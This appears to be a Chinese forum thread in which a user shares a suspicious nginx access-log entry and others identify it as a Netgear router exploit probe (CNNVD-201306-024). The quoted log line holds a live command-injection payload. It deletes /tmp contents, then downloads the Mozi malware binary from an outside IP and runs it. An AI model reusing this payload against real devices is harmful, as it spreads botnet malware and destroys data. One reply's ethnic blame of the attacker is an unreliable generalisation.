嘟嘟社区| 系统是刚装几天的,就装了 nginx 反代一个docker容器,不是80端口
但是nginx就老发现一些奇怪的日志。 比如下面这个。居然还有 “rm+-rf” 这种命令 117.253.56.151 – – [08/Sep/2024:02:59:55 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.219.161.81:50626/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 146 "-" "-" "-" |
他不访问怎么知道不存在? |
| 别人在试漏洞,执行命令 |
不会吧,用访问不存在网页的方式,也能试漏洞? |
| 这是一个针对路由器的漏洞CNNVD-201306-024 |
看来大家的路由器,80端口真的不要轻易打开。 |
| 印度人在干坏事。 |
| 看这些你不是不是觉得太无聊了? |